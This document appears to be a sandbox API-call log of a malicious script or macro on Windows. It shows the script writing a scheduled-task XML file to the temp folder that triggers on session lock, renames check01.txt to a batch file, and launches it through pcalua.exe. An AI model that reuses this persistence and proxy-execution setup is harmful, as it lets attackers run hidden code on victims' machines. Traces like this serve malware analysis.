[0216.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="<", cbMultiByte=1, lpWideCharStr=0x369dc28, cchWideChar=1 | out: lpWideCharStr="<ͩ") returned 1
[0216.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="/", cbMultiByte=1, lpWideCharStr=0x369dc2a, cchWideChar=1 | out: lpWideCharStr="/") returned 1
[0216.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="D", cbMultiByte=1, lpWideCharStr=0x369dc2c, cchWideChar=1 | out: lpWideCharStr="D") returned 1
[0216.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x369dc2e, cchWideChar=1 | out: lpWideCharStr="a\槜∃) returned 1
[0216.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x369dc30, cchWideChar=1 | out: lpWideCharStr="tͩ") returned 1
[0216.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x369dc32, cchWideChar=1 | out: lpWideCharStr="e") returned 1
[0216.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=">", cbMultiByte=1, lpWideCharStr=0x369dc34, cchWideChar=1 | out: lpWideCharStr=">") returned 1
[0216.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\r", cbMultiByte=1, lpWideCharStr=0x369dc36, cchWideChar=1 | out: lpWideCharStr="\r") returned 1
[0216.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\n", cbMultiByte=1, lpWideCharStr=0x369dc38, cchWideChar=1 | out: lpWideCharStr="\n") returned 1
[0216.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dc3a, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
[0216.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dc3c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
[0216.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dc3e, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
[0216.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dc40, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
[0216.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="<", cbMultiByte=1, lpWideCharStr=0x369dc42, cchWideChar=1 | out: lpWideCharStr="<") returned 1
[0216.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="U", cbMultiByte=1, lpWideCharStr=0x369dc44, cchWideChar=1 | out: lpWideCharStr="U") returned 1
[0216.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0x369dc46, cchWideChar=1 | out: lpWideCharStr="R\槜∃) returned 1
[0216.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="I", cbMultiByte=1, lpWideCharStr=0x369dc48, cchWideChar=1 | out: lpWideCharStr="Iͩ") returned 1
[0216.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=">", cbMultiByte=1, lpWideCharStr=0x369dc4a, cchWideChar=1 | out: lpWideCharStr=">") returned 1
[0216.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x369dc4c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1
[0216.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Z", cbMultiByte=1, lpWideCharStr=0x369dc4e, cchWideChar=1 | out: lpWideCharStr="Z\槜∃) returned 1
[0216.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="1", cbMultiByte=1, lpWideCharStr=0x369dc50, cchWideChar=1 | out: lpWideCharStr="1ͩ") returned 1
[0216.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="1", cbMultiByte=1, lpWideCharStr=0x369dc52, cchWideChar=1 | out: lpWideCharStr="1") returned 1
[0216.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="<", cbMultiByte=1, lpWideCharStr=0x369dc54, cchWideChar=1 | out: lpWideCharStr="<") returned 1
[0216.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="/", cbMultiByte=1, lpWideCharStr=0x369dc56, cchWideChar=1 | out: lpWideCharStr="/") returned 1
[0216.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="U", cbMultiByte=1, lpWideCharStr=0x369dc58, cchWideChar=1 | out: lpWideCharStr="U") returned 1
[0216.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0x369dc5a, cchWideChar=1 | out: lpWideCharStr="R") returned 1
[0216.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="I", cbMultiByte=1, lpWideCharStr=0x369dc5c, cchWideChar=1 | out: lpWideCharStr="I") returned 1
[0216.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=">", cbMultiByte=1, lpWideCharStr=0x369dc5e, cchWideChar=1 | out: lpWideCharStr=">") returned 1
[0216.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\r", cbMultiByte=1, lpWideCharStr=0x369dc60, cchWideChar=1 | out: lpWideCharStr="\r") returned 1
[0216.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\n", cbMultiByte=1, lpWideCharStr=0x369dc62, cchWideChar=1 | out: lpWideCharStr="\n") returned 1
[0216.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dc64, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
[0216.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dc66, cchWideChar=1 | out: lpWideCharStr=" \槜∃) returned 1
[0216.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="<", cbMultiByte=1, lpWideCharStr=0x369dc68, cchWideChar=1 | out: lpWideCharStr="<ͩ") returned 1
[0216.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="/", cbMultiByte=1, lpWideCharStr=0x369dc6a, cchWideChar=1 | out: lpWideCharStr="/") returned 1
[0216.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0x369dc6c, cchWideChar=1 | out: lpWideCharStr="R") returned 1
[0216.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x369dc6e, cchWideChar=1 | out: lpWideCharStr="e\槜∃) returned 1
[0216.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0x369dc70, cchWideChar=1 | out: lpWideCharStr="gͩ") returned 1
[0216.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x369dc72, cchWideChar=1 | out: lpWideCharStr="i") returned 1
[0216.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x369dc74, cchWideChar=1 | out: lpWideCharStr="s") returned 1
[0216.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x369dc76, cchWideChar=1 | out: lpWideCharStr="t") returned 1
[0216.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x369dc78, cchWideChar=1 | out: lpWideCharStr="r") returned 1
[0216.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x369dc7a, cchWideChar=1 | out: lpWideCharStr="a") returned 1
[0216.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x369dc7c, cchWideChar=1 | out: lpWideCharStr="t") returned 1
[0216.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x369dc7e, cchWideChar=1 | out: lpWideCharStr="i") returned 1
[0216.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x369dc80, cchWideChar=1 | out: lpWideCharStr="o") returned 1
[0216.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x369dc82, cchWideChar=1 | out: lpWideCharStr="n") returned 1
[0216.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="I", cbMultiByte=1, lpWideCharStr=0x369dc84, cchWideChar=1 | out: lpWideCharStr="I") returned 1
[0216.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x369dc86, cchWideChar=1 | out: lpWideCharStr="n\槜∃) returned 1
[0216.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x369dc88, cchWideChar=1 | out: lpWideCharStr="fͩ") returned 1
[0216.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x369dc8a, cchWideChar=1 | out: lpWideCharStr="o") returned 1
[0216.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=">", cbMultiByte=1, lpWideCharStr=0x369dc8c, cchWideChar=1 | out: lpWideCharStr=">") returned 1
[0216.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\r", cbMultiByte=1, lpWideCharStr=0x369dc8e, cchWideChar=1 | out: lpWideCharStr="\r\槜∃) returned 1
[0216.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\n", cbMultiByte=1, lpWideCharStr=0x369dc90, cchWideChar=1 | out: lpWideCharStr="\nͩ") returned 1
[0216.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dc92, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
[0216.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dc94, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
[0216.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="<", cbMultiByte=1, lpWideCharStr=0x369dc96, cchWideChar=1 | out: lpWideCharStr="<") returned 1
[0216.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0x369dc98, cchWideChar=1 | out: lpWideCharStr="T") returned 1
[0216.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x369dc9a, cchWideChar=1 | out: lpWideCharStr="r") returned 1
[0216.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x369dc9c, cchWideChar=1 | out: lpWideCharStr="i") returned 1
[0216.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0x369dc9e, cchWideChar=1 | out: lpWideCharStr="g") returned 1
[0216.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0x369dca0, cchWideChar=1 | out: lpWideCharStr="g") returned 1
[0216.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x369dca2, cchWideChar=1 | out: lpWideCharStr="e") returned 1
[0216.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x369dca4, cchWideChar=1 | out: lpWideCharStr="r") returned 1
[0216.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x369dca6, cchWideChar=1 | out: lpWideCharStr="s\槜∃) returned 1
[0216.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=">", cbMultiByte=1, lpWideCharStr=0x369dca8, cchWideChar=1 | out: lpWideCharStr=">ͩ") returned 1
[0216.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\r", cbMultiByte=1, lpWideCharStr=0x369dcaa, cchWideChar=1 | out: lpWideCharStr="\r") returned 1
[0216.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\n", cbMultiByte=1, lpWideCharStr=0x369dcac, cchWideChar=1 | out: lpWideCharStr="\n") returned 1
[0216.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dcae, cchWideChar=1 | out: lpWideCharStr=" \槜∃) returned 1
[0216.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dcb0, cchWideChar=1 | out: lpWideCharStr=" ͩ") returned 1
[0216.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dcb2, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
[0216.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dcb4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
[0216.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="<", cbMultiByte=1, lpWideCharStr=0x369dcb6, cchWideChar=1 | out: lpWideCharStr="<") returned 1
[0216.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x369dcb8, cchWideChar=1 | out: lpWideCharStr="S") returned 1
[0216.225] _read (in: _FileHandle=3, _DstBuf=0x107a2888, _MaxCharCount=0x200 | out: _DstBuf=0x107a2888*) returned 512
[0216.225] _read (in: _FileHandle=3, _DstBuf=0x107a2888, _MaxCharCount=0x200 | out: _DstBuf=0x107a2888*) returned 512
[0216.226] _read (in: _FileHandle=3, _DstBuf=0x107a2888, _MaxCharCount=0x200 | out: _DstBuf=0x107a2888*) returned 232
[0216.226] _close (_FileHandle=3) returned 0
[0216.226] CRetailMalloc_Free () returned 0x1
[0216.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME", cchWideChar=9, lpMultiByteStr=0x15dba0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME", lpUsedDefaultChar=0x0) returned 9
[0216.226] getenv_s (in: _ReturnSize=0x15db08, _DstBuf=0x0, _DstSize=0x0, _VarName="USERNAME" | out: _ReturnSize=0x15db08, _DstBuf=0x0) returned 0x0
[0216.226] CRetailMalloc_Alloc () returned 0x12a99d40
[0216.226] getenv_s (in: _ReturnSize=0x15db08, _DstBuf=0x12a99d40, _DstSize=0xa, _VarName="USERNAME" | out: _ReturnSize=0x15db08, _DstBuf="kEecfMwgj") returned 0x0
[0216.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="kEecfMwgj", cbMultiByte=10, lpWideCharStr=0x11afe4c8, cchWideChar=20 | out: lpWideCharStr="kEecfMwgj") returned 10
[0216.227] SysReAllocStringLen (in: pbstr=0x15dad8*="kEecfMwgj", psz=0x0, len=0x9 | out: pbstr=0x15dad8*="kEecfMwgj") returned 1
[0216.227] CRetailMalloc_Free () returned 0x16ed205b80001
[0216.227] GetUserDefaultLCID () returned 0x409
[0216.227] LCMapStringW (in: Locale=0x409, dwMapFlags=0x100, lpSrcStr="\r\n\r\n \r\n 2024-01-02T21:08:22\r\n \\Z11\r\n \r\n \r\n \r\n true\r\n SessionLock\r\n xxx\r\n \r\n \r\n \r\n \r\nInteractiveToken \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n true\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n schtasks.exe\r\n /delete /tn \"\\lockw\" /f\r\n \r\n \r\n cmd.exe\r\n /c \"copy /y \"%temp%\\check01.txt\" \"%temp%\\check01.bat\" & timeout 1\"\r\n \r\n \r\n pcalua.exe\r\n -a \"%temp%\\check01.bat\"\r\n \r\n \r\n", cchSrc=1768, lpDestStr=0x517bd58, cchDest=1768 | out: lpDestStr="\r\n\r\n \r\n 2024-01-02t21:08:22\r\n \\z11\r\n \r\n \r\n \r\n true\r\n sessionlock\r\n xxx\r\n \r\n \r\n \r\n \r\ninteractivetoken \r\n \r\n \r\n \r\n ignorenew\r\n false\r\n true\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n pt72h\r\n 7\r\n \r\n \r\n \r\n schtasks.exe\r\n /delete /tn \"\\lockw\" /f\r\n \r\n \r\n cmd.exe\r\n /c \"copy /y \"%temp%\\check01.txt\" \"%temp%\\check01.bat\" & timeout 1\"\r\n \r\n \r\n pcalua.exe\r\n -a \"%temp%\\check01.bat\"\r\n \r\n \r\n") returned 1768
[0216.230] LCMapStringW (in: Locale=0x409, dwMapFlags=0x100, lpSrcStr="xxx", cchSrc=3, lpDestStr=0x6f12298, cchDest=3 | out: lpDestStr="xxx") returned 3
[0216.230] free (_Block=0x0)
[0216.230] malloc (_Size=0xa0) returned 0x888e2c0
[0216.234] free (_Block=0x888e2c0)
[0216.235] memcpy (in: _Dst=0x177de428, _Src=0x50bc5f8, _Size=0x2de | out: _Dst=0x177de428) returned 0x177de428
[0216.235] memcpy (in: _Dst=0x177de706, _Src=0x6f12298, _Size=0x12 | out: _Dst=0x177de706) returned 0x177de706
[0216.235] memcpy (in: _Dst=0x177de718, _Src=0x70d6d88, _Size=0xb8 | out: _Dst=0x177de718) returned 0x177de718
[0216.235] memcpy (in: _Dst=0x177de7d0, _Src=0x6f12298, _Size=0x12 | out: _Dst=0x177de7d0) returned 0x177de7d0
[0216.235] memcpy (in: _Dst=0x177de7e2, _Src=0x1795c778, _Size=0x6e2 | out: _Dst=0x177de7e2) returned 0x177de7e2
[0216.235] memcpy (in: _Dst=0x177deec4, _Src=0x6f12298, _Size=0x12 | out: _Dst=0x177deec4) returned 0x177deec4
[0216.235] memcpy (in: _Dst=0x177deed6, _Src=0x12e886a8, _Size=0x346 | out: _Dst=0x177deed6) returned 0x177deed6
[0216.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="temp", cchWideChar=5, lpMultiByteStr=0x15dba0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="temp", lpUsedDefaultChar=0x0) returned 5
[0216.236] getenv_s (in: _ReturnSize=0x15db08, _DstBuf=0x0, _DstSize=0x0, _VarName="temp" | out: _ReturnSize=0x15db08, _DstBuf=0x0) returned 0x0
[0216.236] CRetailMalloc_Alloc () returned 0x6f14600
[0216.236] getenv_s (in: _ReturnSize=0x15db08, _DstBuf=0x6f14600, _DstSize=0x25, _VarName="temp" | out: _ReturnSize=0x15db08, _DstBuf="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 0x0
[0216.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cbMultiByte=37, lpWideCharStr=0x70d6d88, cchWideChar=74 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 37
[0216.237] SysReAllocStringLen (in: pbstr=0x15dad8*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", psz=0x0, len=0x24 | out: pbstr=0x15dad8*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 1
[0216.237] CRetailMalloc_Free () returned 0x1
[0216.237] VarAdd (in: pvarLeft=0x1086ee78, pvarRight=0x1086ef58, pvarResult=0x1086ee60 | out: pvarResult=0x1086ee60) returned 0x0
[0216.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml", cchWideChar=-1, lpMultiByteStr=0x15da40, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml", lpUsedDefaultChar=0x0) returned 45
[0216.237] _fullpath (in: _FullPath=0x15dbd0, _Path="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml", _SizeInBytes=0x104 | out: _FullPath="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml"
[0216.237] _sopen_s (in: _FileHandle=0x15db80, _FileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\z11.xml"), _OpenFlag=33537, _ShareFlag=64, _PermissionMode=384 | out: _FileHandle=0x15db80*=3) returned 0x0
[0216.239] CRetailMalloc_Alloc () returned 0x36edb30
[0216.240] strcpy_s (in: _Dst=0x36edd68, _DstSize=0x2d, _Src="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml" | out: _Dst="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml") returned 0x0
[0216.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n\r\n \r\n 2024-01-02T21:08:22\r\n \\Z11\r\n \r\n \r\n \r\n true\r\n SessionLock\r\n kEecfMwgj\r\n \r\n \r\n \r\n \r\nInteractiveToken \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n true\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n schtasks.exe\r\n /delete /tn \"\\lockw\" /f\r\n \r\n \r\n cmd.exe\r\n /c \"copy /y \"%temp%\\check01.txt\" \"%temp%\\check01.bat\" & timeout 1\"\r\n \r\n \r\n pcalua.exe\r\n -a \"%temp%\\check01.bat\"\r\n \r\n \r\n", cchWideChar=1786, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1786
[0216.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n\r\n \r\n 2024-01-02T21:08:22\r\n \\Z11\r\n \r\n \r\n \r\n true\r\n SessionLock\r\n kEecfMwgj\r\n \r\n \r\n \r\n \r\nInteractiveToken \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n true\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n schtasks.exe\r\n /delete /tn \"\\lockw\" /f\r\n \r\n \r\n cmd.exe\r\n /c \"copy /y \"%temp%\\check01.txt\" \"%temp%\\check01.bat\" & timeout 1\"\r\n \r\n \r\n pcalua.exe\r\n -a \"%temp%\\check01.bat\"\r\n \r\n \r\n", cchWideChar=1786, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1786
[0216.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n\r\n \r\n 2024-01-02T21:08:22\r\n \\Z11\r\n \r\n \r\n \r\n true\r\n SessionLock\r\n kEecfMwgj\r\n \r\n \r\n \r\n \r\nInteractiveToken \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n true\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n schtasks.exe\r\n /delete /tn \"\\lockw\" /f\r\n \r\n \r\n cmd.exe\r\n /c \"copy /y \"%temp%\\check01.txt\" \"%temp%\\check01.bat\" & timeout 1\"\r\n \r\n \r\n pcalua.exe\r\n -a \"%temp%\\check01.bat\"\r\n \r\n \r\n", cchWideChar=1786, lpMultiByteStr=0x12e87538, cbMultiByte=1786, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\r\n \r\n 2024-01-02T21:08:22\r\n \\Z11\r\n \r\n \r\n \r\n true\r\n SessionLock\r\n kEecfMwgj\r\n \r\n \r\n \r\n \r\nInteractiveToken \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n true\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n schtasks.exe\r\n /delete /tn \"\\lockw\" /f\r\n \r\n \r\n cmd.exe\r\n /c \"copy /y \"%temp%\\check01.txt\" \"%temp%\\check01.bat\" & timeout 1\"\r\n \r\n \r\n pcalua.exe\r\n -a \"%temp%\\check01.bat\"\r\n \r\n \r\n", lpUsedDefaultChar=0x0) returned 1786
[0216.258] memcpy (in: _Dst=0x36edb68, _Src=0x12e87538, _Size=0x200 | out: _Dst=0x36edb68) returned 0x36edb68
[0216.258] _write (in: _FileHandle=3, _Buf=0x36edb68*, _MaxCharCount=0x200 | out: _Buf=0x36edb68*) returned 512
[0216.261] _write (in: _FileHandle=3, _Buf=0x12e87738*, _MaxCharCount=0x4fa | out: _Buf=0x12e87738*) returned 1274
[0216.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2
[0216.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x10ad0b88, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 2
[0216.262] memcpy (in: _Dst=0x36edb68, _Src=0x10ad0b88, _Size=0x2 | out: _Dst=0x36edb68) returned 0x36edb68
[0216.262] _write (in: _FileHandle=3, _Buf=0x36edb68*, _MaxCharCount=0x2 | out: _Buf=0x36edb68*) returned 2
[0216.262] _close (_FileHandle=3) returned 0
[0216.263] CRetailMalloc_Free () returned 0x1e00ec0001
[0216.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir", cchWideChar=7, lpMultiByteStr=0x15dba0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir", lpUsedDefaultChar=0x0) returned 7
[0216.264] getenv_s (in: _ReturnSize=0x15db08, _DstBuf=0x0, _DstSize=0x0, _VarName="windir" | out: _ReturnSize=0x15db08, _DstBuf=0x0) returned 0x0
[0216.264] CRetailMalloc_Alloc () returned 0x12a99d40
[0216.264] getenv_s (in: _ReturnSize=0x15db08, _DstBuf=0x12a99d40, _DstSize=0xb, _VarName="windir" | out: _ReturnSize=0x15db08, _DstBuf="C:\\Windows") returned 0x0
[0216.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C:\\Windows", cbMultiByte=11, lpWideCharStr=0x11afe4c8, cchWideChar=22 | out: lpWideCharStr="C:\\Windows") returned 11
[0216.264] SysReAllocStringLen (in: pbstr=0x15dad8*="C:\\Windows", psz=0x0, len=0xa | out: pbstr=0x15dad8*="C:\\Windows") returned 1
[0216.264] CRetailMalloc_Free () returned 0x16ed305b80001
[0216.264] VarAdd (in: pvarLeft=0x1086ee78, pvarRight=0x1086ef58, pvarResult=0x1086ee60 | out: pvarResult=0x1086ee60) returned 0x0
